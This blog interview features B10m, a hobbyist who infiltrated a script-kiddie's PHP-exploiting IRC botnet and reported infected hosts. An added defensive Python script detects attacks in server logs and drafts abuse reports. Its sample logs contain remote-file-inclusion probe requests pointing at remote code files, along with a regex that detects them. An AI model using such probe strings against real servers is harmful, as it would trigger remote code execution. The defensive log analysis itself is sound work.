Security Ripcord


Interview with B10m

As I stated in a previous post, I have been paying a little more attention to the URI and Referer information provided by one of my WordPress plugins. At times this information has revealed systems on the Internet that are searching for other systems with vulnerable PHP installations and applications. As I mentioned in the original post, I found a blog where another blogger had already analyzed the scripts that I found on a hacked server which was scanning my web server. The blog is B10[m|g] and the blogger goes by the pseudonym B10m.

After reading another post where B10m confronted a script-kiddie botnet runner with the cracker name “fazanul,” I decided that I would ask B10m to be my first blog interview. He agreed. The following contains my questions and his answers. As you will see, B10m is not a security professional. Rather, he is a software programmer. Because of his interest and investigation into the IRC bot that queried his system, I assumed that he was a security professional or had close ties to them. The majority of my questions take that misconception and run with it. However, B10m was a good sport and answered each question he was able to.

I think it is a good sign that a software programmer decided to take action when he was presented with malicious activity. I would not suggest everybody try to connect to the command and control channels of botnets they locate unless they have experience in the field of malware analysis. Fortunately, B10m did know how to protect himself and his systems to a certain extent but, as he mentions during the interview, he has accepted a certain amount of risk associated with his actions. My recommendation for people wanting to make a difference against crackers is that a simple abuse report to the system owner, the system’s hosting company, and the system’s ISP is probably sufficient.

I would like to thank B10m for agreeing to the interview. I hope you all enjoy.


What made you start blogging? From your site you appear to be living in The Netherlands but you blog in English. Is there any particular reason?

I started blogging quite some time ago on my own hacked up Perl
blogging system. When I found out other people built better systems,
I used that. I was forced to create my own blog by a friend who -at a
certain point- refused to publish my items any longer…

English just seemed to fit better with my topics (mainly technical
issues). I usually get disappointed when I find a blog post in a
language I don’t master, containing the exact error message, and
most likely a solution, I was searching for ;-)

Are you a security professional? What industry do you work in (e.g. government, education, financial, consulting, etc)? What are your primary duties?

Not at all. I’m a software developer (somewhat) and don’t really
have any real security background other than trying to get my apps
to be as secure as possible.

I am going to assume that you do malware analysis either for work or as a hobby. How did you start and what training have you received?

I’m a self-taught geek. Never really had any official training. Just
a lot of reading code will do the trick (besides chatting with
professionals over a few beers). Reading code is fun, and when it’s
supposed to do evil things on my machine, it’s even more fun.

Going after these kiddies isn’t even a hobby though. I just got
obsessed with this fazanul guy. I took a botnet down and rather
quickly, he returned with a new server. So I had to take that down,
and now we’re here. I’m scanning my logfiles for him on a daily basis
now. Others do get by, but I pay less attention to them.

If a security professional were going to fly to Europe for one security conference, which would you recommend and why?

I would have no clue. I’m not into those big conferences too much.
So my answer would probably be Prague. Not because of any
conference, but just because it’s an awesome city ;-)

What resources do European security professionals look to during their day to day work to keep abreast of breaking news and events (e.g. Alert/Vulnerability Lists, Websites, Blogs)?

I’m not a security professional, so I can only speak for myself. I
of course follow slashdot, subscribed to the CERT Advisory mailing
list (so I can taunt MS Windows-using friends often ;-) and look at
digg occasionally.

What training (personal, certification, degrees) would you recommend for persons just starting to look into malware analysis?

No clue, it’s not my job ;-)

Obviously many people in Europe are multilingual but not everybody. How do these language barriers affect the security situation in Europe and how information flows and is interpreted?

Language barriers are not really a problem in Europe. Most kids
learn at least 1 foreign language in school. In the Netherlands it
used to be mandatory (still is?) to study English, German and French
for at least one year in high school. After that, German and French
become optional. English is even being taught by the age of 10 or
so.

I have never run into an abuse desk that couldn’t communicate in
English though. It’s part of the job. Abuse reports may come from
all over the world… I do notice that people get working faster for
you when you do address them in their native language though.

You have started a conversation with a hacker who refers to him/herself as “fazanul,” why did you start that conversation?

The code he used for his attacks was full of “scriptkiddie” signs.
A real coder has a certain programming style as to indentation, etc.
This was clearly a cut’n’paste job, done by someone with little
knowledge.

I wanted to see how many hosts actually were infected by this guy’s
script, so I logged in, pretending to be a bot myself. He launched
commands at me, which I replied with bogus replies, but looked like
real system replies. That was fun for a while and he bought my
answers up until I really made it ridiculous, like giving answers to
questions he never asked… and of course the “I refuse” answer was
something he didn’t expect from a machine.

I was just messing with this kid and found it quite funny, so I
continued talking to him (he doesn’t want to talk much to me
though…).

You used fazanul’s IRC bot to connect to his command and control channel, what did you do to protect yourself before making that connection?

Not really. I read his code and connected to the IRC channel by
BitchX, a regular IRC client.

What tools would a young security professional want to become familiar with to begin to analyze malware like fazanul’s IRC bot?

It just boils down to being bored and having some time left to waste
on these things. I noticed the script being written in Perl. I’m a
Perl hacker so it caught my attention. After that, it’s basic
networking knowledge. It’s quite important to find out who to contact
about network abuse etc. Just scan your logfiles every now and
then for “weird” activity.

It’d probably help to read a little PHP too though. There’s a lot of
horribly insecure PHP code available online. By being able to read
PHP, you can spot errors in the code and patch it. After all, close
to all of these attacks are PHP-script exploits.

Have you noticed any type of DDoS towards your systems and what did you do to protect yourself from fazanul’s repercussions?

Nothing. Since his botnets crumble rather fast I doubt he has the
power to launch a real DDoS attack. If he does, oh well, my poor
little server will suffer and my blog will be inaccessible for a
while. Not that big of a deal. Then again, since this is really a
scriptkiddie without a clue about what he’s doing, I don’t fear this
guy. I fear my buggy hard drive more ;-)

You have been contacting system owners and Internet Service Providers to report the systems being used to spread these IRC bots. Please explain how you do this so that others can do the same.

As I stated before, the most important thing is to find out who is
responsible for a box. First you go after the host of these files.
They are usually not aware of this abuse so they are usually helpful
and friendly. After that, I usually look up who’s currently logged
in the IRC channel, find out their IP addresses and look up the ISPs
belonging to that. I use gwhois[1] for that. These admins are
usually less helpful and friendly (calling my warnings “bogus
claims” and “without logfiles, we won’t do anything” stuff).
Nevertheless, most zombies in the botnet do disappear after my
warnings though.

1. http://freshmeat.net/projects/gwhois/
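The two practical pieces of advice in this interview, scanning your own logfiles for “weird” activity and then finding out who is responsible for the offending box before sending an abuse report, can be put together in a short script. The following Python is an added example written for this page; it is not B10m’s tool, not gwhois, and not anything from the original post. The log lines and whois records are constructed samples using documentation address ranges, and `lookup_whois` is a stand-in for running the `whois` command. It flags requests whose query string passes a URL as a parameter value (the common PHP remote-file-inclusion probe), reads the abuse contact out of RIPE-style (`abuse-mailbox:`) or ARIN-style (`OrgAbuseEmail:`) records with a fallback to any `abuse@` mailbox in the text, and drafts a report that quotes the raw log lines, which is exactly what the “without logfiles, we won’t do anything” abuse desks ask for.

```python
import re
from collections import defaultdict

# Constructed Apache "combined" log lines (sample input; addresses are from the
# documentation ranges and nothing here comes from the original post).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2007:10:01:02 +0100] "GET /index.php?page=http://203.0.113.9/cmd.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/Mar/2007:10:03:11 +0100] "GET /about/ HTTP/1.1" 200 2048 "http://example.net/" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2007:10:01:05 +0100] "GET /wp-content/plugins/x.php?inc=http://203.0.113.9/cmd.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
192.0.2.55 - - [12/Mar/2007:11:20:45 +0100] "GET /gallery/index.php?dir=http://192.0.2.9/r.txt? HTTP/1.1" 404 512 "-" "Mozilla/4.0"
"""

# Constructed whois answers keyed by IP; they stand in for `whois <ip>` output.
SAMPLE_WHOIS = {
    "203.0.113.7": (
        "% RIPE-style record (constructed)\n"
        "inetnum:        203.0.113.0 - 203.0.113.255\n"
        "netname:        ISP-A-NET\n"
        "abuse-mailbox:  abuse@isp-a.example\n"
    ),
    "192.0.2.55": (
        "# ARIN-style record (constructed) with no dedicated abuse field\n"
        "NetRange:       192.0.2.0 - 192.0.2.255\n"
        "OrgName:        Hoster B\n"
        "Comment:        Send abuse complaints to abuse@hoster-b.example\n"
    ),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# A query parameter whose value is a URL: the classic PHP remote-file-inclusion probe.
RFI_RE = re.compile(r'[?&]\w+=(?:https?|ftp)://', re.I)
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')
# Field names registries use for the abuse contact (RIPE/APNIC and ARIN styles).
ABUSE_FIELDS = {"abuse-mailbox", "OrgAbuseEmail"}


def lookup_whois(ip):
    """Stand-in for a real lookup such as subprocess.run(["whois", ip], ...)."""
    return SAMPLE_WHOIS.get(ip, "")


def abuse_contact(whois_text):
    """Best abuse address from raw whois output, or None if nothing is found."""
    for line in whois_text.splitlines():
        if line.startswith(("%", "#")) or ":" not in line:
            continue  # registry comments and free text carry no key
        key, _, value = line.partition(":")
        if key.strip() in ABUSE_FIELDS:
            found = EMAIL_RE.search(value)
            if found:
                return found.group(0)
    # Fallback: an abuse@ mailbox mentioned anywhere, e.g. in remarks/comments.
    for found in EMAIL_RE.finditer(whois_text):
        if found.group(0).lower().startswith("abuse@"):
            return found.group(0)
    return None


def scan(log_text, whois_lookup=lookup_whois):
    """Group RFI-probing requests by source IP and attach each IP's abuse contact."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if match and RFI_RE.search(match.group("path")):
            hits[match.group("ip")].append(line)
    return {ip: {"hits": lines, "abuse": abuse_contact(whois_lookup(ip))}
            for ip, lines in hits.items()}


def draft_report(ip, record):
    """Plain-text report that quotes the raw log lines abuse desks ask for."""
    to = record["abuse"] or "<no abuse contact found; read the whois record by hand>"
    lines = [f"To: {to}",
             f"Subject: PHP exploit scanning from {ip}", "",
             f"The host {ip} requested URLs on our server that try to include remote PHP code.",
             "Log lines (combined format, server local time):", ""]
    lines.extend(record["hits"])
    return "\n".join(lines)


if __name__ == "__main__":
    for ip, record in scan(SAMPLE_LOG).items():
        print(draft_report(ip, record), end="\n\n")
```

On real logs, replace `SAMPLE_LOG` with the contents of your access log and `lookup_whois` with a call to the `whois` binary; the hosting company of the files being included (the URL inside the query string) is a separate, usually friendlier, report, as the answer above notes.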


Go forth and do good things,
Cutaway



3 Responses to “Interview with B10m”

  1. [...] “>Interview with B10m I was so impressed when i saw this post. i really like that i can share it with my readers.From your site you appear to be living in The Netherlands but you blog in English. Is there any particular reason Ive started blogging quite some time ago on my own hacked up Perl blogging system. When I found out other people build …I was really impressed by this work. It’s true masterpiece.Link to original article [...]

  2. [...] Since it seems B10m is far too modest to post about this on his own blog, I take my chances here, heh-heh! His hunt for botnets controlled by scriptkiddies was noticed by “Cutaway Security” and B10m was invited for an interview that was published on the company’s weblog. My favorite line of the whole thing, being a geek: … the “I refuse” answer was something he didn’t expect from a machine … Take a read for yourself: it’s quite funny to read how he was first mistaken for a security professional and how the interviewer has to adapt slowly to the idea that he is not. In the end B10m is pointing us to a tool called “gwhois” to look up IP addresses and the ISPs they belong to, but we all know as sysadmins that jwhois is far better for this purpose, don’t we (tongue-in-cheek)? B10m, interview [...]

  3. [...] My initial interview with B10m sparked my interest in the security professional field in Europe. As I had recently contacted the trio from RaDaJo about helping me notify a Spanish university that one of their servers had been compromised, I decided to contact them with similar questions. The RaDaJo name is a combination of the team members’ names: RAul Siles, DAvid Perez, and JOrge Ortiz [...]
